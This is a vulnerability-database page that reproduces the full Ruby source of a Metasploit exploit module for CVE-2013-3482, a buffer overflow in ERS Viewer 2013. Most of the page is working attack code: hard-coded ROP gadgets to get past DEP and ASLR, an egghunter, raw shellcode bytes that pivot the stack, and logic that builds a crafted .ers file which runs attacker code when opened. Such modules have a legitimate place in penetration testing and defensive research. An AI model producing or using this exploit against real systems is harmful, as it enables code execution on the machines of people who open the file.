Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJames FittsPACKETSTORM:122326
HistoryJul 09, 2013 - 12:00 a.m.

ERS Viewer 2013 ERS File Handling Buffer Overflow

2013-07-0900:00:00
James Fitts
packetstormsecurity.com
33

0.91 High

EPSS

Percentile

98.9%

JSON
`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::Remote::Egghunter  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "ERS Viewer 2013 ERS File Handling Buffer Overflow",  
'Description' => %q{  
This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.  
The vulnerability exists in the module ermapper_u.dll, where the function  
rf_report_error handles user provided data in a insecure way. It results in  
arbitrary code execution under the context of the user viewing a specially crafted  
.ers file. This module has been tested successfully with ERS Viewer 2013 (versions  
13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'James Fitts', # Vulnerability Discovery  
'juan vazquez' # Metasploit  
],  
'References' =>  
[  
[ 'CVE', '2013-3482' ],  
[ 'OSVDB', '93650' ],  
[ 'URL', 'http://secunia.com/advisories/53620/' ]  
],  
'Payload' =>  
{  
'Space' => 4000,  
'DisableNops' => true,  
},  
'DefaultOptions' =>  
{  
'ExitFunction' => "process",  
},  
'Platform' => 'win',  
'Targets' =>  
[  
# Tested on Windows XP SP3  
[ 'ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR',  
{  
'Offset' => 191,  
'Ret' => 0x100329E9 # jmp eax # from ermapper_u.dll  
}  
],  
# Tested on Windows XP SP3 and Windows 7 SP1  
[ 'ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass',  
{  
'Offset' => 191,  
'Ret' => 0x100E1152, # xchg eax, esp # ret # from ermapper_u.dll  
'RetNull' => 0x30d07f00, # ret ending with null byte # from ethrlib.dll  
'VirtualAllocPtr' => 0x1010c0f4  
}  
]  
],  
'Privileged' => false,  
'DisclosureDate' => "May 23 2013",  
'DefaultTarget' => 1))  
  
register_options(  
[  
OptString.new('FILENAME', [ true, 'The file name.', 'msf.ers']),  
], self.class)  
  
end  
  
def create_rop_chain()  
# rop chain generated with mona.py - www.corelan.be  
rop_gadgets =  
[  
0x10082624, # POP EAX # RETN [ermapper_u.dll]  
0x1010c0f4, # ptr to &VirtualAlloc() [IAT ermapper_u.dll]  
0x1001a9c0, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ermapper_u.dll]  
0x1005db36, # XCHG EAX,ESI # RETN [ermapper_u.dll]  
0x10105d87, # POP EBX # RETN [ermapper_u.dll]  
0xffffffff, #  
0x30d059d9, # INC EBX # RETN [ethrlib.dll]  
0x30d059d9, # INC EBX # RETN [ethrlib.dll]  
0x100e9dd9, # POP EAX # RETN [ermapper_u.dll]  
0xa2dbcf75, # put delta into eax (-> put 0x00001000 into edx)  
0x1001aa04, # ADD EAX,5D24408B # RETN [ermapper_u.dll]  
0x10016a98, # XCHG EAX,EDX # OR EAX,4C48300 # POP EDI # POP EBP # RETN [ermapper_u.dll]  
0x10086d21, # RETN (ROP NOP) [ermapper_u.dll]  
0x1001a148, # & push esp # ret [ermapper_u.dll]  
0x10082624, # POP EAX # RETN [ermapper_u.dll]  
0xffffffc0, # Value to negate, will become 0x00000040  
0x100f687d, # NEG EAX # RETN [ermapper_u.dll]  
0x1001e720, # XCHG EAX,ECX # ADC EAX,5DE58B10 # RETN [ermapper_u.dll]  
0x100288b5, # POP EAX # RETN [ermapper_u.dll]  
0x90909090, # nop  
0x100e69e0, # PUSHAD # RETN [ermapper_u.dll]  
].flatten.pack("V*")  
  
return rop_gadgets  
end  
  
# Restore the stack pointer in order to execute the final payload successfully  
def fix_stack  
pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18] # get teb  
pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit  
pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit  
pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset  
return pivot  
end  
  
# In the Windows 7 case, in order to bypass ASLR/DEP successfully, after finding  
# the payload on memory we can't jump there directly, but allocate executable memory  
# and jump there. Badchars: "\x0a\x0d\x00"  
def hunter_suffix(payload_length)  
# push flProtect (0x40)  
suffix = "\xB8\xC0\xFF\xFF\xFF" # mov eax, 0xffffffc0  
suffix << "\xF7\xD8" # neg eax  
suffix << "\x50" # push eax  
# push flAllocationType (0x3000)  
suffix << "\x66\x05\xC0\x2F" # add ax, 0x2fc0  
suffix << "\x50" # push eax  
# push dwSize (0x1000)  
suffix << "\x66\x2D\xFF\x1F" # sub ax, 0x1fff  
suffix << "\x48" # dec eax  
suffix << "\x50" # push eax  
# push lpAddress  
suffix << "\xB8\x0C\x0C\x0C\x0C" # mov eax, 0x0c0c0c0c  
suffix << "\x50" # push eax  
# Call VirtualAlloc  
suffix << "\xFF\x15" + [target['VirtualAllocPtr']].pack("V") # call ds:VirtualAlloc  
# Copy payload (edi) to Allocated memory (eax)  
suffix << "\x89\xFE" # mov esi, edi  
suffix << "\x89\xC7" # mov edi, eax  
suffix << "\x31\xC9" # xor ecx, ecx  
suffix << "\x66\x81\xC1" + [payload_length].pack("v") # add cx, payload_length  
suffix << "\xF3\xA4" # rep movsb  
# Jmp to the final payload (eax)  
suffix << "\xFF\xE0" # jmp eax  
  
return suffix  
end  
  
def exploit  
  
#These badchars do not apply to the final payload  
badchars = [0x0c, 0x0d, 0x0a].pack("C*")  
  
eggoptions =  
{  
:checksum => true,  
:eggtag => 'w00t'  
}  
my_payload = fix_stack + payload.encoded  
  
if target.name =~ /DEP & ASLR bypass/  
# The payload length can't include NULL's in order to  
# build the stub which will copy the final payload to  
# executable memory  
while [my_payload.length].pack("v").include?("\x00")  
my_payload << rand_text(1)  
end  
end  
  
hunter,egg = generate_egghunter(my_payload, badchars, eggoptions)  
  
if target.name =~ /DEP & ASLR bypass/  
hunter.gsub!(/\xff\xe7/, hunter_suffix(my_payload.length))  
end  
  
if target.name =~ /NO DEP/  
buf = rand_text_alpha(1)  
buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected  
buf << "AA" # EAX pointing to buf[5] prefixed with 0x00 after ret  
buf << hunter  
buf << rand_text_alpha(target['Offset'] - buf.length)  
buf << [target.ret].pack("V") # jmp eax  
buf << rand_text_alpha(8)  
buf << egg  
elsif target.name =~ /DEP & ASLR bypass/  
buf = rand_text_alpha(1)  
buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected  
buf << [target['RetNull']].pack("V")[1,3] # EAX pointing to buf[5] prefixed with 0x00 after ret  
buf << create_rop_chain  
buf << hunter  
buf << rand_text_alpha(target['Offset'] - buf.length)  
buf << [target.ret].pack("V") # xchg eax, esp # ret  
buf << rand_text_alpha(8)  
buf << egg  
end  
  
ers = %Q|  
DatasetHeader Begin  
#{buf} End  
|  
  
file_create(ers)  
end  
end  
`

Related

checkpoint_advisories 1
prion 1
zdt 1
cvelist 1
cve 1
nvd 1
checkpoint_advisories
checkpoint_advisories
ERS Viewer 2013 ERS File Handling Buffer Overflow (CVE-2013-3482)
2013-08-20 00:00:00
prion
prion
Stack overflow
2014-01-19 17:16:00
zdt
zdt
ERS Viewer 2013 ERS File Handling Buffer Overflow
2013-07-09 00:00:00
cvelist
cvelist
CVE-2013-3482
2014-01-19 15:00:00
cve
cve
CVE-2013-3482
2014-01-19 17:16:28
nvd
nvd
CVE-2013-3482
2014-01-19 17:16:28

0.91 High

EPSS

Percentile

98.9%

JSON
Related for PACKETSTORM:122326
checkpoint_advisories1prion1zdt1cvelist1cve1nvd1